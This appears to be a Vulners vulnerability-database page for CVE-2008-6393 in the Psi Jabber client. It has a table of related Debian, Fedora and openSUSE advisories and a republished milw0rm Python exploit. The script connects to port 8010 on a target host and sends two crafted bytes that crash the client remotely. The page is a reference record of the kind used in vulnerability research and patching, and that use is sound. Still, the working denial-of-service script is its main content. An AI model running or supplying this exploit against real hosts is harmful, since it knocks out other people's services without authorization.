Psi Jabber Client (Windows / Linux) - Remote Denial of Service
| Reporter | Title | Published | Views | Family All 28 |
|---|---|---|---|---|
| Vulnerabilities in the Debian GNU/Linux operating system that allow a remote attacker to compromise the confidentiality, integrity, and accessibility of protected information | 7 Jul 201600:00 | – | bdu_fstec | |
| CVE-2008-6393 | 23 Dec 200800:00 | – | circl | |
| CVE-2008-6393 | 3 Mar 200916:00 | – | cve | |
| CVE-2008-6393 | 3 Mar 200916:00 | – | cvelist | |
| [SECURITY] [DSA 1741-1] New psi packages fix denial of service | 14 Mar 200911:47 | – | debian | |
| CVE-2008-6393 | 3 Mar 200916:00 | – | debiancve | |
| Debian DSA-1741-1 : psi - integer overflow | 24 Mar 200900:00 | – | nessus | |
| Fedora 10 : psi-0.12.1-1.fc10 (2009-2285) | 23 Apr 200900:00 | – | nessus | |
| Fedora 9 : psi-0.12.1-1.fc9 (2009-2295) | 5 Mar 200900:00 | – | nessus | |
| openSUSE Security Update : psi (psi-574) | 21 Jul 200900:00 | – | nessus |
10
#!/usr/bin/python
#psi jabber client 8010/tcp remote denial of service (win & lin)
#by sha0[at]badchecksum.net
#http://jolmos.blogspot.com
import socket, sys
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
sock.connect((sys.argv[1],8010))
except:
print 'Cannot connect!'
sys.exit(1)
try:
sock.send('\x05\xff')
print 'Crashed!'
except:
print 'Cannot send!'
sock.close()
# milw0rm.com [2008-12-23]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
23 Dec 2008 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 210
EPSS0.18201